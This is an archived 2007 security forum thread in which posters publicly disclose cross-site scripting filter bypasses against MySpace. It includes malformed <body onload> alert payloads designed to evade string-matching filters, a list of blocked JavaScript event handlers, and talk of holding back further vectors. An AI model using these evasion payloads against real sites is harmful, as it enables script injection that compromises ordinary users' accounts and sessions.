Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace (my turn...again)
Posted by: digi7al64
Date: January 10, 2007 06:31AM

In my previous myspace (my turn) thread i stated that if myspace devs didn't patch the problem correctly i would post more.

So the vector that i posted 4 days ago has been patched (along with the 4 previous spoilts exposing the same vuns from various contributors). Again they have failed to do it correctly, again after countless posts describing the issue. outlining the problem and providing methods of fixing the issue... they have failed... alas i must carry out my statement else "shenanigans" be called.

Here is the code walkthrough i used to find it
<body<scriptonload=<scriptt>alert('xss');> 		<body..onload=..t>alert('xss');>
<body <scriptonload<scriptt>=alert('xss');> 	 	<body ..onload..t>=alert('xss');>
<body <scriptonload<script=alert('xss');>		<body ..onload..=alert('xss');>
<body <script onload<script=alert('xss');>		<body .. onload..=alert('xss');>

btw: the patch for the last code i posted was to ignore it altogether, however as i expected that aren't actually rewriting the code to fix the problem, instead they are only targeting specific strings (hence the extra <script tag to fool them... muhahahahahaha!).

ps: As always i have more vectors, however I am enjoying this so i will await their code response before i post again.

pss: rsnake, thanks for the blog mention, it has been my single goal since joining here to do something worthy of inclusion \0/

psss: finding spoilts in myspace might seem like a useless cause (if not skiddish), but, since they are the online largest social network in the world i think it makes perfect sense to target them.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: Kyran
Date: January 10, 2007 07:35AM

Very nice! It's really bad that myspace hasn't fixed this, basically same issue, yet.

MySpace 0-Day Again (Again (Again (Again))) anyone?

- Kyran

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: WhiteAcid
Date: January 10, 2007 07:41AM

I'm really starting to enjoy reading these posts, or maybe that's just due to that it's 1:40pm and I haven't slept for a long time.

I think using powers to express the "agains" would be easier; MySpace 0day Again^4

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: eyeced
Date: January 10, 2007 04:32PM

<body onload<script=alert('hello');>

Stil works fine.. :S

Also some fragmentation works now that can bypass the filters. I'll just leave the posting of it till everythings patched so i can claim my Myspace Again (again,again again,again) title. Well either me or the first person to hit 'Post message' After its been patched.

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: digi7al64
Date: January 10, 2007 05:24PM

eyeced - it is becuase they are only filtering for specific strings


<body onload<script=alert('hello');>

is not

<body onload<script=alert('xss');>

so it should work (though i haven't tested it but i trust you)

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: OrbityBaby
Date: January 11, 2007 12:01PM

digi7al64 Wrote:
-------------------------------------------------------
> In my previous myspace (my turn) thread i stated
> that if myspace devs didn't patch the problem
> correctly i would post more.
>
> So the vector that i posted 4 days ago has been
> patched (along with the 4 previous spoilts
> exposing the same vuns from various contributors).
> Again they have failed to do it correctly, again
> after countless posts describing the issue.
> outlining the problem and providing methods of
> fixing the issue... they have failed... alas i
> must carry out my statement else "shenanigans" be
> called.
>
> Here is the code walkthrough i used to find it
> alert('xss');> alert('xss');>
> =alert('xss');> =alert('xss');>
>
>
>
> btw: the patch for the last code i posted was to
> ignore it altogether, however as i expected that
> aren't actually rewriting the code to fix the
> problem, instead they are only targeting specific
> strings (hence the extra <script tag to fool
> them... muhahahahahaha!).
>
> ps: As always i have more vectors, however I am
> enjoying this so i will await their code response
> before i post again.
>
> pss: rsnake, thanks for the blog mention, it has
> been my single goal since joining here to do
> something worthy of inclusion \0/
>
> psss: finding spoilts in myspace might seem like a
> useless cause (if not skiddish), but, since they
> are the online largest social network in the world
> i think it makes perfect sense to target them.


Looks like as of yesterday, 01/11/07, this has already been patched by MySpace. They're the worst. Got any others up your sleeve?

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: digi7al64
Date: January 11, 2007 05:29PM

hmmm, not at the moment that same to have finally got the idea and removed all the following javascript events and replaced them with ..

onabort
onblur
onchange
onclick
ondblclick
onerror
onfocus
onkeydown
onkeypress
onkeyup
onload
onmousedown
onmousemove
onmouseout
onmouseover
onmouseup
onreset
onresize
onselect
onsubmit
onunload

However, i still think i can find a trick or 2. Will post again we i get something.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: OrbityBaby
Date: January 11, 2007 07:03PM

digi7al64 Wrote:
-------------------------------------------------------
> hmmm, not at the moment that same to have finally
> got the idea and removed all the following
> javascript events and replaced them with ..
>
> onabort
> onblur
> onchange
> onclick
> ondblclick
> onerror
> onfocus
> onkeydown
> onkeypress
> onkeyup
> onload
> onmousedown
> onmousemove
> onmouseout
> onmouseover
> onmouseup
> onreset
> onresize
> onselect
> onsubmit
> onunload
>
> However, i still think i can find a trick or 2.
> Will post again we i get something.


great, thanks. you're the best.

Options: ReplyQuote
Re: Myspace (my turn...again)
Posted by: rsnake
Date: January 12, 2007 01:01PM

The full list of event handlers is located at http://ha.ckers.org/xss.html#XSS_Event_handlers (obviously you have to scroll a lot). Most of those won't work, or require that you already have something on the page to execute them, but for anyone who wasn't already aware of all of them...

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.